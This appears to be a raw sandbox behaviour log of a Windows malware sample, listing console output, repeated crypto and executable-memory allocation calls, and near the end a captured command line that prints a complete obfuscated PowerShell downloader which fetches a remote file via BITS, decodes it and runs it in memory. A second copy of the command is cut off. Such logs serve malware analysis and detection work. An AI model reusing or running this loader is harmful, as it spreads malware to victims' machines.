WriteConsoleW

buffer: + start-BitsTransfer <<<< -source $Medi -Destination $Gibbesvig2
console_handle: 0x0000015f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [Start-BitsTransfer], Exce
console_handle: 0x00000173
1 1 0

WriteConsoleW

buffer: ption
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : StartBitsTransferCOMException,Microsoft.Backgrou
console_handle: 0x000001a7
1 1 0

WriteConsoleW

buffer: ndIntelligentTransfer.Management.NewBitsTransferCommand
console_handle: 0x000001bb
1 1 0

WriteConsoleW

buffer: Start-BitsTransfer : 보안 채널 지원에서 오류가 발생했습니다.
console_handle: 0x0000020f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006953b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006954b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00694f70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695830
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x006950b0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695d30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00695d30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629c618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629c618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629de90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0629ded0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028e0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02232000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ad2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02233000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02234000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02235000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0269c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a50000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02236000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02697000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02698000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02699000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ac9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02aca000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02ace000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02acf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05040000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05041000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05042000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 'Mega$FrimRDateuRvresMalkhXylo=Capr$HenrG sikiInhibHoveb LimeBefisPlanv Kami knugChon2Genk+ Elf$BuddRDopiuColusTraih Eas ') ;.($Iongitr01) (Cintereye9 'Cerv$FrerMPrepaCackt stjeDiskr Ran aff=Mous Omva( Buf(CompgFarvw tramDekai Fes saccwExtri sinnDiak3 spn2snow_ OekpWorlrPindoCarecpleneRetas Opps Fri Tilv- satFDish MagP UnfrVirto Rgfc Lene JagsIrids malIHonndIndb= Aga$ Uro{vensPFolkIBesiD Roc}Halv)Edel. LgsCAureoTandm UtrmDigta Regn Ford LevLsyntiUdsknCaraeGylt) Pre Brin-genisRingpMatel AfsiunpetUdre Twin[ Urncserih Lovasupprbrig] Qui3Vers4 Che ');.($Iongitr01) (Cintereye9 'Anti$ salE WrikMaans Rako Cac Nasu=Enhe Alle$EpalM GalaThintCocte folrReko[Zaff$RelaM Rala Ulit Tokeskulr Rom. denc Rego ImpuCascnUnfit Bac- Til2 Met]Unad ');.($Iongitr01) (Cintereye9 ' slu$AbhoTAnaleAntir Impr WriaBgenpGeraispecn XissTrde=Circ( BruTNepheBlthsFjertHolo-GribP Bara UdgtBenshOmri Pre$OverR Maeu snrsMacrhOver) swi Eru- staAInten NondAarv data(Anat[ PasIBibbnPowdt KapP Prot Kryrsher] For:subu: FlosHooyi Arbz syne Und Udsl-Gadee BalqNarr Rich8Mary) Mar ') ;if ($Terrapins) {.$Rush $Ekso;} else {;$Iongitr00=Cintereye9 ' Lans Rost Bloastopr BuntEsco-KontB numisupet RidsEkstTPlagr FeaaAbstnForvssubsfUndeestenrFrem reun-GamisNuveoCadiuultrrFogmc ConeComp Pseu$DuopMUnphesultdZiggiNaal Brot-MellDBasaesigjs InctPediiEmannRefoaUnpet TiniUnslo PapnDamp schi$ PapG svii KalbinklbAntie Meas stov MediMiligBard2 Flu ';.($Iongitr01) (Cintereye9 'Ubes$skygGHagei Hoybbrinb TwieKlicsLifevInteistifg Hep2 Nit=Udbr$ stieOximn Gumv Rep: telaHibipFluopsenidstraa BudtReopasyno ') ;.($Iongitr01) (Cintereye9 'TilbIMissmforepsniro Tryr GlitImpl-OverM UsloLiggdClimuAlmilOldee Tol methBBdepiGarvtgrelsPlumTsipir thwaDescn RetsHibefsamee HekrEksp ') ;$Gibbesvig2=$Gibbesvig2+'\Fractiong.stu';while (-not $Preternat) {.($Iongitr01) (Cintereye9 ' Rat$ unaPInsurOveredomitNatteManorBritnPolia smetPred= Bes( BarTEnqueKlunssheetGift- skrP disa CantDaarhTors skos$ InfGFintiIleibBerib Uroe Ides scav MariArsegGram2Turb)Livs ') ;.($Iongitr01) $Iongitr00;.($Iongitr01) (Cintereye9 ' ekss BeftslagaCharr scrtKoge-HockskloalKhaneDumpe RespPela Mask5 Udg ');}.($Iongitr01) (Cintereye9 'Deca$ AtoC Pagi LatnTweetBerleRenhr CuteFasayKoageAngl Eric=Pent DjvG Pere smrtMeek-OverCImpro Benn HydtNarre AlunTekst Til Legi$OdioGungdiVanfbBrunb ExheMarmsArtiv GloiRipog Til2 Dru ');.($Iongitr01) (Cintereye9 ' For$FinaR RygePuntn InwlPhotiAfluv brn Reti=Anti Ger[Tasassociy shosstartnecressttm Alo.PameC ProoRenhn Monv ManesubirRefothund] Bal:Noti:TrawF ReprAlaro ChomPatsB spoa DgnsEnaleBill6 Pen4DannssupetLderr Fori Unin WeigKnip(Bese$storC Fori Eskn Palt Fise sekr Peresugey octeUnde) Cam ');.($Iongitr01) (Cintereye9 ' Ufr$tunfIGullo InvnspergPrefiRevit ConrIntr2 rel Ansk= Rot Annu[scopsFuguy FensKulitEctoe CremRetr.ArseT MaseHypoxrefottaun. KonE nonnsalvc TraoOverdKiloiskiln AftgArch] Coc:Fjer:DoctA Ters PreCCronIKautI sno.NonaGHyste sodtVaris kuktAfmarDataiskspn Colg Cla(supe$stilR supeCaudn Gull LyniDivavskol) Ben ');.($Iongitr01) (Cintereye9 'Rink$ sogVImmuiKjerc Besk Unissmreb Banusnyd= Gra$KonsI Urgo svenOutcgProvismokt Yakr mea2Frds.Rects MenuHebrb BogsRentt IndrInveiRappnAbstg Fas(Radi2 Ove1Dors3Glem4 Lat8slet1 Pre,strk2Wall8 ble0Opgi0surf8Lage) Ord ');.($Iongitr01) $Vicksbu;}"
cmdline powershell "Function Cintereye9 ([string]$Abdiceri){For($Knack=4; $Knack -lt $Abdiceri.Length-1; $Knack+=(4+1)){$Arbejdsa18=$Abdiceri.substring( $Knack, 1);$Iongitr+=$Arbejdsa18};$Iongitr;}$Medi=Cintereye9 'MetahUncrtRookt astp GarsRkke:Taha/Chem/ Trnwsesaw LewwProt.Cabrt Oprashapr Kraaferrm DrfuupthlRelaaChanlEffebPreri NonnLsepesammlLiomo somr stu.Orotr Diso Lav/ TrnR skueCanin stet GejeNsketUdhoeMarsrKragm Bli.KommoProtc TraxRese ';$Iongitr01=Cintereye9 ' skaistore MasxYaup ';$Rush = Cintereye9 ' Rei\EkspsChecy Beks AptwJanio BumwOver6Anim4Draw\ sciW BruipilenMilldBlgeoKortwOrm sEddiPGantoNovew skie UncrUforssnightankeTigglreselObvi\kandv spe1Drot. sve0Rari\ genpsvagoInvow sameMusirTryksRapthRelieMacrlsuctlKere. Rese svixAcaceKost ';.($Iongitr01) (Cintereye9 'Inex$ViriG Liti skab svibrundeBlaasIntevUfo i Unwg Udt2 Hel= Coc$Lykke sannBlyiv Gre: ForwOveriNotanfritdNeohiHalvr Gre ') ;.($Iongitr01) (Cintereye9 